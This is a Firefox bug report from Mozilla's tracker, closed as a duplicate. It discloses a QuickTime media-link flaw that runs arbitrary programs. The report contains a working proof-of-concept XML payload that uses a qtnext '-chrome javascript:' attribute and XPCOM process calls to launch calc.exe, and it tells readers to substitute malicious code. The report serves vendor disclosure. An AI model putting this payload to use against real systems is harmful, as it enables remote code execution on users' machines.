Closed
Bug 395978
Opened 17 years ago
Closed 17 years ago
Security problem with quicktime : execution of malicious code
Categories
(Firefox :: Security, defect)
Tracking
()
VERIFIED
DUPLICATE
of bug 395942
People
(Reporter: manul.pallas, Unassigned)
Details
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
<?xml version="1.0">
<?quicktime type="application/x-quicktime-media-link"?>
<embed src="a.mp3" autoplay="true" qtnext="-chrome javascript:file=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath('c:\\windows\\system32\\calc.exe');process=Components.classes['@mozilla.org/process/util;1'].createInstance(Components.interfaces.nsIProcess);process.init(file);process.run(true,[],0);void(0);"/>
Reproducible: Always
Steps to Reproduce:
1. Use the code, and replace the line 'file.initWithPath('c:\\windows\\system32\\calc.exe' with any malicious code
2. Boum
3. Drink a coffee.
Actual Results:
Something like badgad?
Expected Results:
Fx should not launch quicktime if the file is not a true mp3 file (or any other multimedia file).
Comment 1•17 years ago
|
||
Duplicate, and since this issue's public there's no need for this bug to remain private.
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 17 years ago
Resolution: --- → DUPLICATE
Updated•17 years ago
|
Status: RESOLVED → VERIFIED
You need to log in
before you can comment on or make changes to this bug.
Description
•